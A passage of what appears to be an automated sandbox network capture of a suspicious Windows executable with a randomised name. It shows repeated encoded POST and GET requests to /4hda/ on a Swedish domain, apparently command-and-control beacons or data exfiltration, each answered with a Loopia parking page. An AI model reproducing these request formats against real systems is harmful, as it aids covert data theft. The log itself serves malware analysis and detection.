72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:08:53.728641987 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                  Jul 13, 2024 00:08:53.728660107 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                  Jul 13, 2024 00:08:53.728758097 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                  Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                  Jul 13, 2024 00:08:53.728774071 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                  Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.449751194.9.94.85804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:55.622361898 CEST811OUTPOST /4hda/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Origin: http://www.xn--matfrmn-jxa4m.se
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d
                                  Data Ascii: tDA=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                                  Jul 13, 2024 00:08:56.262490034 CEST1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:08:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:08:56.262523890 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                  Jul 13, 2024 00:08:56.262542009 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                  Jul 13, 2024 00:08:56.262557030 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                  Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                  Jul 13, 2024 00:08:56.262574911 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                  Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.449752194.9.94.85804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:58.156059027 CEST10893OUTPOST /4hda/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Origin: http://www.xn--matfrmn-jxa4m.se
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b 68 77 77 2f 6e [TRUNCATED]
                                  Data Ascii: tDA=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LLr25XL [TRUNCATED]
                                  Jul 13, 2024 00:08:58.809704065 CEST1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:08:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:08:58.809750080 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                  Jul 13, 2024 00:08:58.809787035 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                  Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                  Jul 13, 2024 00:08:58.809823036 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                                  Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                  Jul 13, 2024 00:08:58.809855938 CEST448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                                  Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                  Jul 13, 2024 00:08:58.809891939 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                  Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                  Jul 13, 2024 00:08:58.809921980 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                  Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.449753194.9.94.85804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:09:00.686052084 CEST517OUTGET /4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:09:01.325706005 CEST1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:09:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:09:01.325731993 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                  Jul 13, 2024 00:09:01.325745106 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                  Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                  Jul 13, 2024 00:09:01.325761080 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
